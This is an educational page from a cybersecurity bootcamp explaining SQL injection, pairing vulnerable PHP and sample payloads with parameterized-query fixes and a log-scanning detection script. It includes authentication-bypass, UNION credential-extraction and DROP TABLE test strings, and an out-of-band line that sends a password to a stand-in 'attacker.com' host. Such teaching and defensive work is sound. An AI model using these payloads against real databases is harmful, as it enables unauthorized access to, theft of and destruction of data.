
SQL Injection

A code injection attack that exploits vulnerabilities in web applications by inserting malicious SQL statements into input fields, allowing attackers to manipulate databases, access unauthorized data, or execute administrative operations.

Author: Unihackers Team

Why It Matters

SQL injection has consistently ranked among the most critical web application vulnerabilities for over two decades. Despite being well-understood and preventable, SQLi continues to plague applications, enabling data breaches that expose millions of records.

The impact of SQL injection extends far beyond simple data access. Successful attacks can:

  • Extract entire databases including passwords and personal information
  • Modify or delete data, causing operational disruption
  • Bypass authentication and impersonate users
  • Execute commands on the underlying server
  • Pivot to attack internal network systems

Some of the largest data breaches in history resulted from SQL injection, including incidents affecting major retailers, government agencies, and technology companies. The continued prevalence of this vulnerability reflects both legacy code issues and ongoing failures in secure development practices.

For security professionals, SQL injection serves as a fundamental skill area. Penetration testers must identify and exploit these vulnerabilities; developers must write secure code; and security engineers must implement defensive controls that catch what development misses.

How SQL Injection Works

SQL injection occurs when user input is incorporated into database queries without proper validation or sanitization:

Vulnerable Code Example

vulnerable-login.php
PHP

// VULNERABLE CODE - Never do this!
$username = $_POST['username'];
$password = $_POST['password'];

$query = "SELECT * FROM users
        WHERE username = '$username'
        AND password = '$password'";

$result = mysqli_query($connection, $query);

Attack Execution

sql-injection-attack.txt
Text

Normal input:
username: admin
password: password123

Query becomes:
SELECT * FROM users WHERE username = 'admin' AND password = 'password123'

Malicious input:
username: admin' --
password: anything

Query becomes:
SELECT * FROM users WHERE username = 'admin' --' AND password = 'anything'

The -- comments out the password check, granting access!

Types of SQL Injection

In-Band SQLi

Results are returned directly in the application response.

Union-based: Combines attacker query results with legitimate query output.

union-injection.sql
SQL

-- Original query: SELECT name, price FROM products WHERE id = '1'

-- Injection: 1' UNION SELECT username, password FROM users --
-- Combined query extracts user credentials alongside product data

Error-based: Extracts data through database error messages.

error-based.sql
SQL

-- Force errors that reveal information
1' AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT password FROM users LIMIT 1))) --

Blind SQLi

No direct output visible; attackers infer results through application behavior.

Boolean-based: Different responses based on true/false conditions.

boolean-blind.sql
SQL

-- If first character of password is 'a', page loads normally
1' AND SUBSTRING((SELECT password FROM users WHERE id=1),1,1)='a' --

-- Iterate through characters to extract data

Time-based: Uses database delays to extract information.

time-based.sql
SQL

-- If condition is true, response delays 5 seconds
1' AND IF(SUBSTRING(password,1,1)='a', SLEEP(5), 0) --

Out-of-Band SQLi

Data exfiltrated through external channels (DNS, HTTP requests).

out-of-band.sql
SQL

-- Exfiltrate data via DNS lookup
1'; SELECT LOAD_FILE(CONCAT('\\', (SELECT password FROM users LIMIT 1), '.attacker.com\a')) --

SQL Injection Impact

Data Exfiltration

  • Extract user credentials, personal information, financial data
  • Dump entire database contents
  • Access data across multiple tables and databases

Authentication Bypass

auth-bypass.sql
SQL

-- Classic bypass: always-true condition
' OR '1'='1' --
' OR 1=1 --
admin' --

Data Manipulation

  • Modify account balances or permissions
  • Delete records or drop tables
  • Insert malicious data

System Compromise

  • Execute operating system commands (via xp_cmdshell, etc.)
  • Read/write files on the server
  • Pivot to internal network

Prevention Techniques

Parameterized Queries (Prepared Statements)

The primary defense: the SQL text is fixed before any user data is seen, and the values are sent to the database separately as bound parameters, so they are never parsed as SQL.

secure-python.py
Python

# SECURE - Using parameterized query
# The placeholder style depends on the driver (%s for psycopg2 and
# mysql-connector, ? for sqlite3); in every case the driver binds the
# values. Never build the string yourself with %, .format() or f-strings.
cursor.execute(
  "SELECT * FROM users WHERE username = %s AND password = %s",
  (username, password)
)

secure-java.java
Java

// SECURE - Using PreparedStatement
String query = "SELECT * FROM users WHERE username = ? AND password = ?";
PreparedStatement stmt = connection.prepareStatement(query);
stmt.setString(1, username);
stmt.setString(2, password);
ResultSet rs = stmt.executeQuery();
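The login query from the Attack Execution walkthrough above and the parameterized fix from this section, side by side in one runnable script. This is an added example, not code from the original page; it uses Python's built-in sqlite3 module (placeholder ? rather than the %s shown above) and a constructed in-memory users table.

```python
import sqlite3

def make_db():
    """Constructed in-memory database with one account (sample data for the demo)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    # Plaintext password only to mirror the page's query; real systems store salted hashes.
    conn.execute("INSERT INTO users (username, password) VALUES ('admin', 'password123')")
    conn.commit()
    return conn

def login_vulnerable(conn, username, password):
    """VULNERABLE: input is spliced into the SQL text, so a quote and a comment marker
    in the username rewrite the query, exactly as in the walkthrough above."""
    query = (f"SELECT id FROM users WHERE username = '{username}' "
             f"AND password = '{password}'")
    return conn.execute(query).fetchone() is not None

def login_safe(conn, username, password):
    """SECURE: the SQL text is fixed and the values travel separately as bound
    parameters, so "admin' --" is compared literally against the username column."""
    query = "SELECT id FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone() is not None

def demo():
    """Run the normal and malicious inputs from the walkthrough through both versions."""
    conn = make_db()
    return {
        "normal/vulnerable": login_vulnerable(conn, "admin", "password123"),
        "normal/safe":       login_safe(conn, "admin", "password123"),
        "bypass/vulnerable": login_vulnerable(conn, "admin' --", "anything"),
        "bypass/safe":       login_safe(conn, "admin' --", "anything"),
    }

if __name__ == "__main__":
    for case, granted in demo().items():
        print(f"{case:18s} access granted: {granted}")
```

Only the vulnerable version grants access to the `admin' --` input; the parameterized query treats it as a username that does not exist.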

Input Validation

  • Validate data types (expect integer, reject strings)
  • Whitelist allowed characters
  • Reject known malicious patterns (a weak secondary control that is easily bypassed; never rely on it alone)
  • Validate length constraints

Stored Procedures

stored-procedure.sql
SQL

-- SECURE when properly implemented: the parameters are bound, not concatenated.
-- A procedure that builds its query text with string concatenation and EXEC
-- is just as injectable as inline SQL.
CREATE PROCEDURE AuthenticateUser
  @Username NVARCHAR(50),
  @Password NVARCHAR(50)
AS
BEGIN
  SELECT * FROM Users
  WHERE Username = @Username AND Password = @Password
END

Defense in Depth

  • Web Application Firewall (WAF) to detect attack patterns
  • Principle of least privilege for database accounts
  • Disable unnecessary database features
  • Encrypt sensitive data at rest
  • Regular security testing and code review

defense-layers.txt
Text

Defense Layer Stack:
1. Input validation at application boundary
2. Parameterized queries for all database interactions
3. Least privilege database accounts
4. WAF rules for SQLi patterns
5. Database activity monitoring
6. Regular penetration testing
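As an added example (not from the original page), a small log-review script that implements the "WAF rules for SQLi patterns" and "database activity monitoring" layers in miniature: it URL-decodes each request in a set of constructed access-log lines and flags the payload shapes shown earlier on this page. The rule names, log lines and IP addresses are all constructed for the demo; a fixed pattern list like this is a monitoring aid that can be evaded, not a replacement for parameterized queries.

```python
import re
from urllib.parse import unquote_plus

# Each rule: (name, regex applied to the URL-decoded request target). The shapes
# mirror the payloads discussed on this page; they are illustrative, not exhaustive.
RULES = [
    ("comment-terminator", re.compile(r"'\s*(--|#)")),                      # admin' --
    ("always-true",        re.compile(r"\bor\b\s*'?1'?\s*=\s*'?1", re.I)),  # ' OR '1'='1
    ("union-select",       re.compile(r"\bunion\b.{0,40}\bselect\b", re.I)),
    ("error-based",        re.compile(r"\bextractvalue\s*\(", re.I)),
    ("time-based",         re.compile(r"\b(sleep|benchmark|waitfor)\b", re.I)),
    ("out-of-band",        re.compile(r"\bload_file\s*\(", re.I)),
]

# Constructed sample access-log lines (combined-log style, trimmed); IPs are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [01/May/2026:10:00:01 +0000] "GET /product?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [01/May/2026:10:00:02 +0000] "GET /product?id=1%27%20UNION%20SELECT%20username,password%20FROM%20users%20-- HTTP/1.1" 200 2048
10.0.0.7 - - [01/May/2026:10:00:03 +0000] "POST /login?username=admin%27%20--&password=x HTTP/1.1" 302 0
10.0.0.8 - - [01/May/2026:10:00:04 +0000] "GET /product?id=1%27%20AND%20IF(SUBSTRING(password,1,1)=%27a%27,SLEEP(5),0)%20-- HTTP/1.1" 200 512
10.0.0.9 - - [01/May/2026:10:00:05 +0000] "GET /search?q=o%27reilly HTTP/1.1" 200 900
"""

# client IP, then the request target inside the quoted "METHOD target HTTP/x.y" field
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) ')

def scan_line(line):
    """Return (client_ip, [names of rules that fired]) or None if the line does not parse."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    ip, target = m.group(1), unquote_plus(m.group(2))  # decode once, as a WAF would
    return ip, [name for name, rx in RULES if rx.search(target)]

def scan_log(text):
    """Map each client IP to the sorted rule names that fired on any of its requests."""
    alerts = {}
    for line in text.splitlines():
        parsed = scan_line(line)
        if parsed and parsed[1]:
            alerts.setdefault(parsed[0], set()).update(parsed[1])
    return {ip: sorted(names) for ip, names in alerts.items()}

if __name__ == "__main__":
    for ip, names in scan_log(SAMPLE_LOG).items():
        print(f"{ip}: {', '.join(names)}")
```

The last sample line (a legitimate apostrophe in `o'reilly`) is there to show that a bare quote on its own should not page anyone; tune rules on real traffic before alerting on them.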

Testing for SQL Injection

Manual Testing

test-payloads.txt
Text

Basic test payloads:
'
"
1' OR '1'='1
1' AND '1'='2
1; DROP TABLE users --
' UNION SELECT NULL --

Automated Tools

  • SQLMap: Automated SQL injection detection and exploitation
  • Burp Suite: Web application security testing platform
  • OWASP ZAP: Open-source web scanner

Career Connection

SQL injection expertise is valuable across security roles. Web application penetration testers regularly test for and exploit SQLi; secure code reviewers identify vulnerable patterns; and application security engineers implement prevention controls.

Application Security Roles (US Market)

Role                           Entry Level   Mid Level   Senior
Application Security Analyst   $75,000       $100,000    $135,000
Web Application Pen Tester     $80,000       $110,000    $145,000
Application Security Engineer  $95,000       $125,000    $165,000

Source: CyberSeek

In the Bootcamp

How We Teach SQL Injection

In our Cybersecurity Bootcamp, you won't just learn about SQL Injection in theory. You'll practice with real tools in hands-on labs, guided by industry professionals who use these concepts daily.

Covered in:

Module 10: Penetration Testing and Ethical Hacking

Related topics you'll master: Metasploit, Nmap, Burp Suite, Privilege Escalation